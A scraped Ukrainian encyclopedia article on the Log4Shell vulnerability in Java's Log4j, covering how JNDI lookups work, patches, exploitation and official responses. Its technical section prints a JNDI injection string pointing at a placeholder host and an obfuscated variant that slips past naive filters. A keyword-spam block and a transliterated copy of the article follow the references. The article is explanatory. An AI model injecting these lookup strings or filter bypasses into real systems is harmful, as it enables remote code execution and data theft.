Log4Shell (CVE-2021-44228) — це вразливість нульового дня в Log4j, популярному середовищі ведення журналів Java, що включає виконання довільного коду. Вразливість – її існування не було помічено з 2013 року – було розкрито в приватному порядку Apache Software Foundation, проектом якої є Log4j, Чен Чжаоцзюнь із групи безпеки Alibaba Cloud 24 листопада 2021 року та публічно розкрито 9 грудня 2021 року. Apache дав Log4Shell оцінку серйозності CVSS 10, найвищу доступну оцінку. Підраховано, що експлойт торкається сотень мільйонів пристроїв і дуже простий у використанні.
Уразливість використовує те, що Log4j дозволяє запити до довільних серверів LDAP та , а не перевіряє відповіді, дозволяючи зловмисникам виконувати довільний код Java на сервері чи іншому комп'ютері або передавати конфіденційну інформацію. Список вразливих програмних проектів був опублікований групою безпеки Apache. Затронуті комерційні служби включають Amazon Web Services, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ та багато інших. За даними Wiz та , вразливість торкнулася 93% корпоративних хмарних середовищ.
Експерти охарактеризували Log4Shell як найбільшу вразливість за всю історію; LunaSec охарактеризувала його як «проектний збій катастрофічних масштабів», Tenable сказав, що експлойт був «найбільшою і найкритичнішою вразливістю в історії», Ars Technica назвав його «можливо найсерйознішою вразливістю за всю історію». і The Washington Post заявили, що описи фахівців з безпеки «межують з апокаліпсисом».
Передісторія
Log4j — це бібліотека журналювання з відкритим вихідним кодом, яка дозволяє розробникам програмного забезпечення реєструвати дані у своїх додатках. Ці дані можуть включати введення користувача. Він повсюдно використовується в програмах Java, особливо в корпоративному програмному забезпеченні. Спочатку написаний у 2001 році Чекі Гюльджю, тепер він є частиною Apache Logging Services, проекту Apache Software Foundation. Колишній член комісії з кібербезпеки президента Барака Обами Том Келлерманн охарактеризував Apache як «одну з гігантських опор мосту, що сприяє сполучній тканині між світами додатків та комп'ютерним середовищем».
Поведінка
Інтерфейс іменування та каталогів Java (JNDI) дозволяє виконувати пошук об'єктів Java під час виконання програми з урахуванням шляху до даних. JNDI може використовувати кілька інтерфейсів каталогів, кожен із яких забезпечує свою схему пошуку файлів. Серед цих інтерфейсів — полегшений протокол доступу до каталогів (LDAP), протокол, не пов'язаний з Java, який витягує дані об'єкта у вигляді URL-адреси з відповідного сервера, локального або будь-якого іншого в Інтернеті.
У конфігурації за умовчанням під час реєстрації рядка Log4j 2 виконує підстановку рядків у виразах виду ${prefix:name}
. Наприклад, Text: ${java:version}
можна перетворити на Text: Java version 1.7.0_67
. Серед розпізнаних виразів є ${jndi:<lookup>}
; вказавши пошук через LDAP, довільна URL-адреса може бути запитана і завантажена як дані об'єкта Java. ${jndi:ldap://example.com/file}
завантажить дані з цієї URL-адреси під час підключення до Інтернету. Вводячи рядок, який реєструється, зловмисник може завантажити та виконати шкідливий код, розміщений на загальнодоступній URL-адресі. Навіть якщо виконання даних вимкнено, зловмисник може отримати дані, такі як секретні змінні середовища, розміщуючи їх в URL-адресі, в якій вони будуть замінені та надіслані на сервер зловмисника. Крім LDAP, інші потенційно використовувані протоколи пошуку JNDI включають його безпечний варіант LDAPS, Java Remote Method Invocation (RMI), систему доменних імен (DNS) та Internet Inter-ORB Protocol (IIOP).
Оскільки HTTP-запити часто реєструються, поширеним вектором атаки є розміщення шкідливого рядка в URL-адресі HTTP-запиту або в HTTP-заголовку, що часто реєструється, такому як User-Agent. Ранні заходи захисту включали блокування будь-яких запитів, що містять потенційно шкідливий вміст, наприклад ${jndi
. Наївний пошук можна обійти, заплутавши запит: наприклад, ${${lower:j}ndi
буде перетворено на пошук JNDI після виконання малої операції над літерою j
. Навіть якщо введення, таке як ім'я, не реєструється відразу, воно може бути пізніше записане під час внутрішньої обробки і його вміст буде виконано.
Виправлення
Виправлення для цієї вразливості випустили 6 грудня 2021 року, за три дні до публікації вразливості, в Log4j версії 2.15.0-rc1. Виправлення включало обмеження серверів і протоколів, які можна використовувати для пошуку. Дослідники виявили пов'язану помилку CVE-2021-45046, яка допускає локальне або віддалене виконання коду в певних конфігураціях, відмінних від налаштувань за умовчанням, і була виправлена у версії 2.16.0, яка відключила всі функції з використанням JNDI та підтримку пошуку повідомлень. Для попередніх версій клас org.apache.logging.log4j.core.lookup.
JndiLookup
необхідно видалити з шляху до класів, щоб зменшити обидві вразливості. Раніше рекомендоване виправлення для старих версій полягало в установці для системної властивості log4j2.formatMsgNoLookups true, але ця зміна не запобігає використанню CVE-2021-45046.
Більш нові версії Java Runtime Environment (JRE) також зменшують цю вразливість, блокуючи завантаження віддаленого коду за умовчанням, хоча в деяких додатках все ще існують інші напрямки атак. Було опубліковано кілька методів та інструментів, які допомагають виявити використання вразливих версій log4j у вбудованих пакетах Java.
Використання
Експлойт дозволяє хакерам отримати контроль над вразливими пристроями за допомогою Java. Деякі хакери використовують вразливість, щоб використовувати можливості жертв; у тому числі майнінг криптовалюти, створення ботнетів, розсилання спаму, створення бекдорів та інші незаконні дії, такі як атаки програм-вимагачів. Протягом кількох днів після публікації вразливості Check Point відслідковувала мільйони атак, ініційованих хакерами, при цьому деякі дослідники спостерігали швидкість понад сто атак на хвилину, що зрештою призвело до більш ніж 40% атак. бізнес-мереж, які зазнають міжнародних атак.
За словами генерального директора Cloudflare Метью Прінса, докази використання або тестування експлойту з'явилися ще 1 грудня, за дев'ять днів до того, як його було публічно розкрито. Згідно з кібербезпекою фірми GreyNoise, кілька IP-адрес були зіскібами сайтів для перевірки серверів, які мають вразливість. Декілька ботнетів почали сканування на предмет вразливості, включаючи ботнет Muhstik до 10 грудня, а також Mirai, Tsunami та XMRig. Конті було помічено з використанням уразливості 17 грудня.
Деякі групи, що спонсоруються державою в Китаї та Ірані, також використовували експлойт, згідно з Check Point, хоча невідомо, чи використовувався експлойт Ізраїлем, Росією чи США до розкриття вразливості. Check Point заявила, що 15 грудня 2021 року хакери, які підтримує Іран, спробували проникнути в мережі підприємств та уряди Ізраїлю.
Відповідь та вплив
Урядовий
У Сполучених Штатах директор Агентства з кібербезпеки та безпеки інфраструктури (CISA) Джен Істерлі описала експлойт як «один із найсерйозніших, якщо не найсерйозніший, який я бачив за всю свою кар'єру», пояснивши, що сотні мільйонів пристроїв були порушені та рекомендували постачальникам приділяти пріоритетна увага оновлень програмного забезпечення. Громадянські агентства, найняті урядом США, мали до 24 грудня 2021 року виправити вразливості, хоча на той час це вже дозволило б отримати доступ до сотень тисяч цілей.
Канадський центр кібербезпеки (CCCS) закликав організації вжити негайних заходів. Податкове управління Канади тимчасово відключило свої онлайн-сервіси після того, як дізналося про експлойт, тоді як уряд Квебеку закрив майже 4000 своїх веб-сайтів як «превентивний захід».
Федеральне управління безпеки Німеччини (BSI) визначило експлойт як загрозу, що знаходиться на найвищому рівні, назвавши його «надзвичайно критичною небезпечною ситуацією» (перекладено). Він також повідомив, що кілька атак вже були успішними і що масштаби вразливості, як і раніше, важко оцінити. Національний центр кібербезпеки Нідерландів (NCSC) розпочав постійний список вразливих програм.
Міністерство промисловості та інформаційних технологій Китаю призупинило роботу з Alibaba Cloud як партнер з аналізу загроз кібербезпеці на шість місяців через те, що не повідомило про вразливість уряду першим.
Бізнеси
Дослідження, проведене Wiz та показало, що 93% хмарного корпоративного середовища були вразливі для Log4Shell. 7% вразливих робочих навантажень доступні в Інтернеті і схильні до широких спроб експлуатації. Згідно з дослідженням, через десять днів після публікації вразливості (20 грудня 2021 року) лише 45% вразливих робочих навантажень було виправлено в середньому в хмарних середовищах. Хмарні дані Amazon, Google і Microsoft торкнулися Log4Shell.
Компанія з управління персоналом і персоналом UKG, одна з найбільших компаній у галузі, зазнала атаки програм-вимагачів, що торкнулася великих підприємств. UKG заявила, що вона не має доказів використання Log4Shell в інциденті, хоча аналітик Аллан Ліска з компанії Recorded Future, що займається кібербезпекою, сказав, що, можливо, існує зв'язок.
Оскільки великі компанії почали випускати виправлення для експлойту, ризик для малого бізнесу збільшився, оскільки хакери зосередилися на більш вразливих цілях.
Конфіденційність
Персональні пристрої, такі як Smart TV та камери відеоспостереження, підключені до Інтернету, були вразливими для експлойту.
Аналіз
Станом на 14 грудня 2021 року майже половину всіх корпоративних мереж у світі було активно досліджено, і протягом доби було створено понад 60 варіантів експлойту. Check Point Software Technologies у докладному аналізі описала ситуацію як «справжню кіберпандемію» та охарактеризувала можливість завдання шкоди як «незліченну». У кількох початкових рекомендаціях було завищено кількість вразливих пакетів, що призводило до помилкових спрацьовувань. Зокрема пакет «log4j api» був відзначений як уразливий, тоді як насправді подальші дослідження показали, що вразливим був лише основний пакет «log4j-core».
Це було підтверджено як у вихідній галузі випуску, так і зовнішніми дослідниками безпеки.
Технологічний журнал Wired написав, що, незважаючи на попередній«галас» навколо численних уразливостей, «галас навколо вразливості Log4j… виправдовує себе з цілого ряду причин». Журнал пояснює, що всюдисутність log4j, вразливість якої важко виявити за потенційними цілями, і легкість передачі коду на комп'ютер жертви створили «поєднання серйозності, доступності та поширеності, яка вразила фахівців з безпеки». Wired також схематично представив послідовність використання Log4Shell хакерами: групи, що займаються майнінгом, криптовалют першими почнуть експлуатувати вразливість, потім торговці даними продадуть «плацдарм» кіберзлочинцям, які нарешті займуться вимаганням, шпигунством та знищенням даних.
Аміт Йоран, генеральний директор Tenable і директор-засновник групи готовності до комп'ютерних надзвичайних ситуацій у США, заявив: «[Log4Shell], безумовно, найбільша та критична вразливість в історії», зазначивши, що витончені атаки почалися невдовзі після помилки, заявивши: «Ми також вже бачимо, що він використовується для атак програм-вимагачів, що, знову ж таки, має стати серйозним сигналом тривоги... Ми також бачили повідомлення про зловмисників, які використовують Log4Shell для знищення систем, навіть не намагаючись отримати викуп, — досить незвичайне поведінка». Старший дослідник загроз Sophos Шон Галлахер сказав: «Чесно кажучи, найбільша загроза тут полягає в тому, що люди вже отримали доступ і просто користуються ним, і навіть якщо ви усунете проблему, хтось вже перебуває в мережі... Він буде існувати стільки ж, скільки й Інтернет».
Примітки
- Wortley, Free (9 грудня 2021). Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package. LunaSec (англ.). Архів оригіналу за 25 грудня 2021. Процитовано 12 грудня 2021.
- CVE-2021-44228. Common Vulnerabilities and Exposures. Архів оригіналу за 25 грудня 2021. Процитовано 12 грудня 2021.
- Povolny, Steve (10 грудня 2021). Log4Shell Vulnerability is the Coal in our Stocking for 2021. McAfee (англ.). Архів оригіналу за 24 грудня 2021. Процитовано 12 грудня 2021.
- Worst Apache Log4j RCE Zero day Dropped on Internet. Cyber Kendra. 9 грудня 2021. Архів оригіналу за 24 грудня 2021. Процитовано 12 грудня 2021.
- Newman, Lily Hay (10 грудня 2021). 'The Internet Is on Fire'. Wired (амер.). ISSN 1059-1028. Архів оригіналу за 24 грудня 2021. Процитовано 12 грудня 2021.
- Murphy, Hannah (14 грудня 2021). Hackers launch more than 1.2m attacks through Log4J flaw. Financial Times. Архів оригіналу за 17 грудня 2021. Процитовано 17 грудня 2021.
- Apache Log4j Security Vulnerabilities. Log4j. Apache Software Foundation. Архів оригіналу за 26 грудня 2021. Процитовано 12 грудня 2021.
- Murphy, Hannah (14 грудня 2021). Hackers launch more than 1.2m attacks through Log4J flaw. Financial Times. Архів оригіналу за 21 грудня 2021. Процитовано 17 грудня 2021.
{{}}
: Вказано більш, ніж один|accessdate=
та|access-date=
() - Hunter, Tatum (20 грудня 2021). The ‘most serious’ security breach ever is unfolding right now. Here’s what you need to know. The Washington Post. Архів оригіналу за 27 грудня 2021. Процитовано 25 грудня 2021.
{{}}
: Вказано більш, ніж один|url-status=
та|deadlink=
() - Mott, Nathaniel (10 грудня 2021). Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit. PC Magazine (англ.). Архів оригіналу за 24 грудня 2021. Процитовано 12 грудня 2021.
- Goodin, Dan (10 грудня 2021). Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet. Ars Technica (амер.). Архів оригіналу за 23 грудня 2021. Процитовано 12 грудня 2021.
- Apache projects affected by log4j CVE-2021-44228. 14 грудня 2021. Архів оригіналу за 17 грудня 2021. Процитовано 25 грудня 2021.
{{}}
: Вказано більш, ніж один|url-status=
та|deadlink=
() - Update for Apache Log4j2 Issue (CVE-2021-44228). Amazon Web Services. 12 грудня 2021. Архів оригіналу за 28 грудня 2021. Процитовано 13 грудня 2021.
- Lovejoy, Ben (14 грудня 2021). Apple patches Log4Shell iCloud vulnerability, described as most critical in a decade. . Архів оригіналу за 23 грудня 2021. Процитовано 25 грудня 2021.
- Security Vulnerability in Minecraft: Java Edition. Minecraft. Mojang Studios. Архів оригіналу за 24 грудня 2021. Процитовано 13 грудня 2021.
- Goodin, Dan (10 грудня 2021). The Internet's biggest players are all affected by critical Log4Shell 0-day. . Архів оригіналу за 25 грудня 2021. Процитовано 13 грудня 2021.
- Rundle, David Uberti and James (15 грудня 2021). What Is the Log4j Vulnerability?. Архів оригіналу за 25 грудня 2021. Процитовано 25 грудня 2021.
- Enterprises halfway through patching Log4Shell | Wiz Blog. www.wiz.io. Архів оригіналу за 20 грудня 2021. Процитовано 20 грудня 2021.
- Hunter, Tatum; de Vynck, Gerrit (20 грудня 2021). The ‘most serious’ security breach ever is unfolding right now. Here’s what you need to know. The Washington Post. Архів оригіналу за 27 грудня 2021. Процитовано 25 грудня 2021.
{{}}
: Вказано більш, ніж один|url-status=
та|deadlink=
() - Barrett, Brian. The Next Wave of Log4J Attacks Will Be Brutal. Wired (амер.). ISSN 1059-1028. Архів оригіналу за 17 грудня 2021. Процитовано 17 грудня 2021.
- Goodin, Dan (13 грудня 2021). As Log4Shell wreaks havoc, payroll service reports ransomware attack. Ars Technica (амер.). Архів оригіналу за 17 грудня 2021. Процитовано 17 грудня 2021.
{{}}
: Вказано більш, ніж один|url-status=
та|deadlink=
() - Yan, Tao (10 грудня 2021). Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228). Unit 42 (англ.). . Архів оригіналу за 24 грудня 2021. Процитовано 25 грудня 2021.
- Apache Log4j 2. Apache Software Foundation. Архів оригіналу за 14 грудня 2021. Процитовано 12 грудня 2021.
- Byrnes, Jesse (14 грудня 2021). Hillicon Valley — Apache vulnerability sets off alarm bells. (англ.). Архів оригіналу за 17 грудня 2021. Процитовано 17 грудня 2021.
{{}}
: Вказано більш, ніж один|url-status=
та|deadlink=
() - RFC rfc4511. doi:10.17487/RFCrfc4511.
- Graham-Cumming, John (10 грудня 2021). Inside the Log4j2 vulnerability (CVE-2021-44228). The Cloudflare Blog (англ.). Архів оригіналу за 22 грудня 2021. Процитовано 13 грудня 2021.
- Graham-Cumming, John (10 грудня 2021). Inside the Log4j2 vulnerability (CVE-2021-44228). The Cloudflare Blog (англ.). Архів оригіналу за 22 грудня 2021. Процитовано 13 грудня 2021.
- Lookups. Log4j. Apache Software Foundation. Архів оригіналу за 25 грудня 2021. Процитовано 13 грудня 2021.
- Graham-Cumming, John (10 грудня 2021). Inside the Log4j2 vulnerability (CVE-2021-44228). The Cloudflare Blog (англ.). Архів оригіналу за 22 грудня 2021. Процитовано 13 грудня 2021.
- Ducklin, Paul (12 грудня 2021). Log4Shell explained – how it works, why you need to know, and how to fix it. Naked Security. Sophos. Архів оригіналу за 26 грудня 2021. Процитовано 12 грудня 2021.
- Miessler, Daniel (13 грудня 2021). The log4j (Log4Shell) Situation. Unsupervised Learning. Архів оригіналу за 13 грудня 2021. Процитовано 25 грудня 2021.
- Duraishamy, Ranga (13 грудня 2021). Patch Now Apache Log4j Vulnerability Called Log4Shell Actively Exploited. Trend Micro. Архів оригіналу за 20 грудня 2021. Процитовано 14 грудня 2021.
- Narang, Satnam (10 грудня 2021). CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell). Tenable Blog. Архів оригіналу за 20 грудня 2021. Процитовано 14 грудня 2021.
- Gabor, Gabriel (10 грудня 2021). CVE-2021-44228 - Log4j RCE 0-day mitigation. The Cloudflare Blog. Архів оригіналу за 23 грудня 2021. Процитовано 13 грудня 2021.
- Hahad, Mounir (12 грудня 2021). Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns. Архів оригіналу за 13 грудня 2021. Процитовано 12 грудня 2021.
- Graham-Cumming, John (10 грудня 2021). Inside the Log4j2 vulnerability (CVE-2021-44228). The Cloudflare Blog (англ.). Архів оригіналу за 22 грудня 2021. Процитовано 13 грудня 2021.
- Restrict LDAP access via JNDI by rgoers #608. Log4j (англ.). 5 грудня 2021. Архів оригіналу за 30 грудня 2021. Процитовано 12 грудня 2021.
- Berger, Andreas (17 грудня 2021). What is Log4Shell? The Log4j vulnerability explained (and what to do about it). Dynatrace news. Архів оригіналу за 21 грудня 2021. Процитовано 25 грудня 2021.
Apache issued a patch for CVE-2021-44228, version 2.15, on December 6. However, this patch left part of the vulnerability unfixed, resulting in CVE-2021-45046 and a second patch, version 2.16, released on December 13. Apache released a third patch, version 2.17, on December 17 to fix another related vulnerability, CVE-2021-45105.
- Rudis, boB (10 грудня 2021). Widespread Exploitation of Critical Remote Code Execution in Apache Log4j | Rapid7 Blog. Rapid7 (англ.). Архів оригіналу за 21 грудня 2021. Процитовано 25 грудня 2021.
- CVE-2021-45046. Common Vulnerabilities and Exposures. 15 грудня 2021. Архів оригіналу за 25 грудня 2021. Процитовано 15 грудня 2021.
- Greig, Jonathan (14 грудня 2021). Second Log4j vulnerability discovered, patch already released. ZDNet (англ.). Архів оригіналу за 27 грудня 2021. Процитовано 17 грудня 2021.
- CVE-2021-45046. Common Vulnerabilities and Exposures. 15 грудня 2021. Архів оригіналу за 25 грудня 2021. Процитовано 15 грудня 2021.
- CVE-2021-45046. Common Vulnerabilities and Exposures. 15 грудня 2021. Архів оригіналу за 25 грудня 2021. Процитовано 15 грудня 2021.
- Java(TM) SE Development Kit 8, Update 121 (JDK 8u121) Release Notes (англ.). Oracle. 17 січня 2017. Архів оригіналу за 19 грудня 2021. Процитовано 13 грудня 2021.
- Exploiting JNDI Injections in Java. . 3 січня 2019. Архів оригіналу за 15 грудня 2021. Процитовано 15 грудня 2021.
- Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228). www.lunasec.io (англ.). 13 грудня 2021. Архів оригіналу за 24 грудня 2021. Процитовано 13 грудня 2021.
- Woodyard, Chris. 'Critical vulnerability': Smaller firms may find it harder to stop hackers from exploiting Log4j flaw. USA Today (амер.). Процитовано 17 грудня 2021.
{{}}
: Обслуговування CS1: Сторінки з параметром url-status, але без параметра archive-url () - Exploit activity for Apache Log4j vulnerability - CVE-2021-44228. Greynoise Research. 10 грудня 2021. Архів оригіналу за 20 грудня 2021. Процитовано 14 грудня 2021.
- Duckett, Chris. Log4j RCE activity began on 1 December as botnets start using vulnerability. ZDNet (англ.). Архів оригіналу за 22 грудня 2021. Процитовано 13 грудня 2021.
- Zugec, Martin (13 грудня 2021). Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild. Business Insights. . Архів оригіналу за 15 грудня 2021. Процитовано 25 грудня 2021.
- Barrett, Brian. The Next Wave of Log4J Attacks Will Be Brutal. Wired (амер.). ISSN 1059-1028. Архів оригіналу за 27 грудня 2021. Процитовано 17 грудня 2021.
{{}}
: Вказано більш, ніж один|accessdate=
та|access-date=
() - Statement from CISA Director Easterly on "Log4j" Vulnerability. CISA. 11 грудня 2021. Архів оригіналу за 27 грудня 2021. Процитовано 25 грудня 2021.
- Woodyard, Chris. 'Critical vulnerability': Smaller firms may find it harder to stop hackers from exploiting Log4j flaw. USA Today (амер.). Процитовано 17 грудня 2021.
{{}}
: Обслуговування CS1: Сторінки з параметром url-status, але без параметра archive-url () - Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action. Government of Canada (англ.). 12 грудня 2021. Архів оригіналу за 20 грудня 2021. Процитовано 25 грудня 2021. [Архівовано 2021-12-20 у Wayback Machine.]
- Cabrera, Holly (12 грудня 2021). Facing cybersecurity threats, Quebec shuts down government websites for evaluation. CBC News. Архів оригіналу за 20 грудня 2021. Процитовано 12 грудня 2021.
- Sauerwein, Jörg (12 грудня 2021). BSI warnt vor Sicherheitslücke. (нім.). Архів оригіналу за 5 січня 2022. Процитовано 25 грудня 2021.
- Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage (Пресреліз) (нім.). 11 грудня 2021. Архів оригіналу за 13 грудня 2021. Процитовано 25 грудня 2021.
- J. Vaughan-Nichols, Steven (14 грудня 2021). Log4Shell: We Are in So Much Trouble. The New Stack. Архів оригіналу за 23 грудня 2021. Процитовано 25 грудня 2021.
- NCSC-NL/log4shell. National Cyber Security Centre (Netherlands). Архів оригіналу за 29 грудня 2021. Процитовано 14 грудня 2021.
- Apache Log4j bug: China’s industry ministry pulls support from Alibaba Cloud for not reporting flaw to government first. Архів оригіналу за 25 грудня 2021. Процитовано 25 грудня 2021.
- Bray, Hiawatha (15 грудня 2021). Emerging ‘Log4j’ software bug spawns worldwide worry over cyber attacks - The Boston Globe. The Boston Globe (амер.). Архів оригіналу за 17 грудня 2021. Процитовано 17 грудня 2021.
{{}}
: Вказано більш, ніж один|url-status=
та|deadlink=
() - Bray, Hiawatha (15 грудня 2021). Emerging ‘Log4j’ software bug spawns worldwide worry over cyber attacks - The Boston Globe. The Boston Globe (амер.). Архів оригіналу за 17 грудня 2021. Процитовано 17 грудня 2021.
{{}}
: Вказано більш, ніж один|url-status=
та|deadlink=
() - Almost half of networks probed for Log4Shell weaknesses. . 14 грудня 2021. Архів оригіналу за 20 грудня 2021. Процитовано 25 грудня 2021.
- The numbers behind a cyber pandemic – detailed dive. Check Point Software. 13 грудня 2021. Архів оригіналу за 24 грудня 2021. Процитовано 25 грудня 2021.
- LOG4J2-3201: Limit the protocols JNDI can use and restrict LDAP. Apache's JIRA issue tracker. Архів оригіналу за 25 грудня 2021. Процитовано 14 грудня 2021.
Вікіпедія, Українська, Україна, книга, книги, бібліотека, стаття, читати, завантажити, безкоштовно, безкоштовно завантажити, mp3, відео, mp4, 3gp, jpg, jpeg, gif, png, малюнок, музика, пісня, фільм, книга, гра, ігри, мобільний, телефон, android, ios, apple, мобільний телефон, samsung, iphone, xiomi, xiaomi, redmi, honor, oppo, nokia, sonya, mi, ПК, web, Інтернет
Nemaye perevirenih versij ciyeyi storinki jmovirno yiyi she ne pereviryali na vidpovidnist pravilam proektu Log4Shell CVE 2021 44228 ce vrazlivist nulovogo dnya v Log4j populyarnomu seredovishi vedennya zhurnaliv Java sho vklyuchaye vikonannya dovilnogo kodu 1 2 Vrazlivist yiyi isnuvannya ne bulo pomicheno z 2013 roku bulo rozkrito v privatnomu poryadku Apache Software Foundation proektom yakoyi ye Log4j Chen Chzhaoczyun iz grupi bezpeki Alibaba Cloud 24 listopada 2021 roku ta publichno rozkrito 9 grudnya 2021 roku 3 4 5 6 Apache dav Log4Shell ocinku serjoznosti CVSS 10 najvishu dostupnu ocinku 7 Pidrahovano sho eksplojt torkayetsya soten miljoniv pristroyiv i duzhe prostij u vikoristanni 8 9 Urazlivist vikoristovuye te sho Log4j dozvolyaye zapiti do dovilnih serveriv LDAP ta JNDI a ne pereviryaye vidpovidi 1 10 11 dozvolyayuchi zlovmisnikam vikonuvati dovilnij kod Java na serveri chi inshomu komp yuteri abo peredavati konfidencijnu informaciyu 5 Spisok vrazlivih programnih proektiv buv opublikovanij grupoyu bezpeki Apache 12 Zatronuti komercijni sluzhbi vklyuchayut Amazon Web Services 13 Cloudflare 14 iCloud Minecraft Java Edition 15 Steam Tencent QQ ta bagato inshih 10 16 17 Za danimi Wiz ta EY vrazlivist torknulasya 93 korporativnih hmarnih seredovish 18 Eksperti oharakterizuvali Log4Shell yak najbilshu vrazlivist za vsyu istoriyu 19 LunaSec oharakterizuvala jogo yak proektnij zbij katastrofichnih masshtabiv 5 Tenable skazav sho eksplojt buv najbilshoyu i najkritichnishoyu vrazlivistyu v istoriyi 20 Ars Technica nazvav jogo mozhlivo najserjoznishoyu vrazlivistyu za vsyu istoriyu 21 i The Washington Post zayavili sho opisi fahivciv z bezpeki mezhuyut z apokalipsisom 19 Zmist 1 Peredistoriya 2 Povedinka 3 Vipravlennya 4 Vikoristannya 5 Vidpovid ta vpliv 5 1 Uryadovij 5 2 Biznesi 5 3 Konfidencijnist 6 Analiz 7 PrimitkiPeredistoriyared Log4j ce biblioteka zhurnalyuvannya z vidkritim vihidnim kodom yaka dozvolyaye rozrobnikam programnogo zabezpechennya reyestruvati dani u svoyih dodatkah Ci dani mozhut vklyuchati vvedennya koristuvacha 22 Vin povsyudno vikoristovuyetsya v programah Java osoblivo v korporativnomu programnomu zabezpechenni 5 Spochatku napisanij u 2001 roci Cheki Gyuldzhyu teper vin ye chastinoyu Apache Logging Services proektu Apache Software Foundation 23 Kolishnij chlen komisiyi z kiberbezpeki prezidenta Baraka Obami Tom Kellermann oharakterizuvav Apache yak odnu z gigantskih opor mostu sho spriyaye spoluchnij tkanini mizh svitami dodatkiv ta komp yuternim seredovishem 24 Povedinkared Interfejs imenuvannya ta katalogiv Java JNDI dozvolyaye vikonuvati poshuk ob yektiv Java pid chas vikonannya programi z urahuvannyam shlyahu do danih JNDI mozhe vikoristovuvati kilka interfejsiv katalogiv kozhen iz yakih zabezpechuye svoyu shemu poshuku fajliv Sered cih interfejsiv polegshenij protokol dostupu do katalogiv LDAP protokol ne pov yazanij z Java 25 yakij vityaguye dani ob yekta u viglyadi URL adresi z vidpovidnogo servera lokalnogo abo bud yakogo inshogo v Interneti 26 U konfiguraciyi za umovchannyam pid chas reyestraciyi ryadka Log4j 2 vikonuye pidstanovku ryadkiv u virazah vidu prefix name 27 Napriklad Text java version mozhna peretvoriti na Text Java version 1 7 0 67 28 Sered rozpiznanih viraziv ye jndi lt lookup gt vkazavshi poshuk cherez LDAP dovilna URL adresa mozhe buti zapitana i zavantazhena yak dani ob yekta Java jndi ldap example com file zavantazhit dani z ciyeyi URL adresi pid chas pidklyuchennya do Internetu Vvodyachi ryadok yakij reyestruyetsya zlovmisnik mozhe zavantazhiti ta vikonati shkidlivij kod rozmishenij na zagalnodostupnij URL adresi 29 Navit yaksho vikonannya danih vimkneno zlovmisnik mozhe otrimati dani taki yak sekretni zminni seredovisha rozmishuyuchi yih v URL adresi v yakij voni budut zamineni ta nadislani na server zlovmisnika 30 31 Krim LDAP inshi potencijno vikoristovuvani protokoli poshuku JNDI vklyuchayut jogo bezpechnij variant LDAPS Java Remote Method Invocation RMI sistemu domennih imen DNS ta Internet Inter ORB Protocol IIOP 32 33 Oskilki HTTP zapiti chasto reyestruyutsya poshirenim vektorom ataki ye rozmishennya shkidlivogo ryadka v URL adresi HTTP zapitu abo v HTTP zagolovku sho chasto reyestruyetsya takomu yak User Agent Ranni zahodi zahistu vklyuchali blokuvannya bud yakih zapitiv sho mistyat potencijno shkidlivij vmist napriklad jndi 34 Nayivnij poshuk mozhna obijti zaplutavshi zapit napriklad lower j ndi bude peretvoreno na poshuk JNDI pislya vikonannya maloyi operaciyi nad literoyu j 35 Navit yaksho vvedennya take yak im ya ne reyestruyetsya vidrazu vono mozhe buti piznishe zapisane pid chas vnutrishnoyi obrobki i jogo vmist bude vikonano 36 Vipravlennyared Vipravlennya dlya ciyeyi vrazlivosti vipustili 6 grudnya 2021 roku za tri dni do publikaciyi vrazlivosti v Log4j versiyi 2 15 0 rc1 37 38 39 Vipravlennya vklyuchalo obmezhennya serveriv i protokoliv yaki mozhna vikoristovuvati dlya poshuku Doslidniki viyavili pov yazanu pomilku CVE 2021 45046 yaka dopuskaye lokalne abo viddalene vikonannya kodu v pevnih konfiguraciyah vidminnih vid nalashtuvan za umovchannyam i bula vipravlena u versiyi 2 16 0 yaka vidklyuchila vsi funkciyi z vikoristannyam JNDI ta pidtrimku poshuku povidomlen 40 41 Dlya poperednih versij klas org apache logging log4j core lookup JndiLookup neobhidno vidaliti z shlyahu do klasiv shob zmenshiti obidvi vrazlivosti 7 42 Ranishe rekomendovane vipravlennya dlya starih versij polyagalo v ustanovci dlya sistemnoyi vlastivosti log4j2 formatMsgNoLookups true ale cya zmina ne zapobigaye vikoristannyu CVE 2021 45046 43 Bilsh novi versiyi Java Runtime Environment JRE takozh zmenshuyut cyu vrazlivist blokuyuchi zavantazhennya viddalenogo kodu za umovchannyam hocha v deyakih dodatkah vse she isnuyut inshi napryamki atak 1 30 44 45 Bulo opublikovano kilka metodiv ta instrumentiv yaki dopomagayut viyaviti vikoristannya vrazlivih versij log4j u vbudovanih paketah Java 46 Vikoristannyared Eksplojt dozvolyaye hakeram otrimati kontrol nad vrazlivimi pristroyami za dopomogoyu Java 8 Deyaki hakeri vikoristovuyut vrazlivist shob vikoristovuvati mozhlivosti zhertv u tomu chisli majning kriptovalyuti stvorennya botnetiv rozsilannya spamu stvorennya bekdoriv ta inshi nezakonni diyi taki yak ataki program vimagachiv 8 19 47 Protyagom kilkoh dniv pislya publikaciyi vrazlivosti Check Point vidslidkovuvala miljoni atak inicijovanih hakerami pri comu deyaki doslidniki sposterigali shvidkist ponad sto atak na hvilinu sho zreshtoyu prizvelo do bilsh nizh 40 atak biznes merezh yaki zaznayut mizhnarodnih atak 8 24 Za slovami generalnogo direktora Cloudflare Metyu Prinsa dokazi vikoristannya abo testuvannya eksplojtu z yavilisya she 1 grudnya za dev yat dniv do togo yak jogo bulo publichno rozkrito Zgidno z kiberbezpekoyu firmi GreyNoise kilka IP adres buli ziskibami sajtiv dlya perevirki serveriv yaki mayut vrazlivist 48 Dekilka botnetiv pochali skanuvannya na predmet vrazlivosti vklyuchayuchi botnet Muhstik do 10 grudnya a takozh Mirai Tsunami ta XMRig 8 49 50 Konti bulo pomicheno z vikoristannyam urazlivosti 17 grudnya 19 Deyaki grupi sho sponsoruyutsya derzhavoyu v Kitayi ta Irani takozh vikoristovuvali eksplojt zgidno z Check Point hocha nevidomo 